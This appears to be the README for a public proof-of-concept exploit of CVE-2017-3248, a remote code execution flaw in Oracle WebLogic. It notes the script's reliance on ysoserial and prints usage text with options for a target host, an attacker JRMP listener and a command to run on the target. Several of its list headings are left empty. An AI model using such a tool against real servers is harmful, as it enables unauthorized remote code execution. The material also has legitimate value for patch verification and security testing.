


The script exploit-CVE-2017-3248-bobsecq.py exploits the CVE-2017-3248 (https://www.tenable.com/security/research/tra-2017-07). It is the first script/POC for exploiting the "Oracle WebLogic RMI Registry UnicastRef Object Java Deserialization Remote Code Execution" vulnerability because Tenable (which has discovered this vulnerability) has not published an exploit/POC.

This script can be used for:

This script needs the last version of Ysoserial (https://github.com/frohoff/ysoserial)

Version affected by this vulnerability (according to Oracle):

This exploit has been tested on Weblogic Server (without and with ssl).

$ python exploit-CVE-2017-3248-bobsecq.py -h
usage: exploit-CVE-2017-3248-bobsecq.py [-h] -t TARGET -p PORT
                                        [--jip ATTACKERIP]
                                        [--jport ATTACKERPORT]
                                        [--cmd CMDTOEXECUTE] [--check] [--ssl]
                                        --ysopath YSOPATH
                                        [--payloadType PAYLOADTYPE]

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET             target IP
  -p PORT               target port
  --jip ATTACKERIP      Local JRMP listener ip
  --jport ATTACKERPORT  Local JRMP listener port (default: 3412)
  --cmd CMDTOEXECUTE    Command to execute on the target
  --check               Check if vulnerable
  --ssl                 Enable ssl connection
  --ysopath YSOPATH     Ysoserial path
  --payloadType PAYLOADTYPE
                        Payload to use in JRMP listener (default: